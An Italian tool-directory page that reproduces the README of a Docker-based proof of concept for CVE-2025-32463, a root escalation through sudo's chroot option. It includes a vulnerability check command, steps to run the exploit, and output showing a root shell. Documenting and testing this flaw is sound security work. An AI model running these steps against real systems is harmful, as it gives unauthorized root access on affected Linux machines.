Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32463_chwoot — Escalation dei privilegi a root tramite il binario sudo con l'opzione chroot. CVE-2025-32463 | Kitploit
Strumenti/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingEscape dal Container
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Escalation dei privilegi a root tramite il binario sudo con l'opzione chroot. CVE-2025-32463

Vedi Repository
525952310 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Questo repository fornisce un ambiente minimale e riproducibile per dimostrare la vulnerabilità di escalation dei privilegi CVE‑2025‑32463 nella funzionalità chroot di sudo.

  • Questa vulnerabilità è stata segnalata da Rich Mirch (@0xm1rch su X) presso Stratascale.
  • Post originale: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Versioni Affette

Le build vulnerabili di sudo 1.9.14 fino a 1.9.17 (tutte le revisioni p) sulla maggior parte delle distribuzioni Linux sono affette.

Pagine di sicurezza

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Contenuti

FileScopo
DockerfileCrea un'immagine Ubuntu 24.04 con sudo 1.9.16p2 vulnerabile e strumenti di compilazione
sudo‑chwoot.shExploit proof‑of‑concept che genera una shell root all'interno del chroot
run.shScript helper che crea l'immagine (se necessario) e avvia il container dell'exploit

Verifica rapida della vulnerabilità

# Vulnerabile sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patchato sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Test dell'exploit in container Docker

# 1 – clona il repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – crea ed esegui l'immagine Docker (con tag "sudo-chwoot")
$ ./run.sh

# 3 – esegui l'exploit nel container (esegue direttamente il comando root o ti apre una shell root)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh passa --privileged e --rm a Docker in modo che il container si pulisca da solo all'uscita.


Pulizia

Rimuovi l'immagine quando hai finito:

docker rmi sudo-chwoot

Riferimenti

  • Nota sulla vulnerabilità di Stratascale CRU: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Scarica lo strumento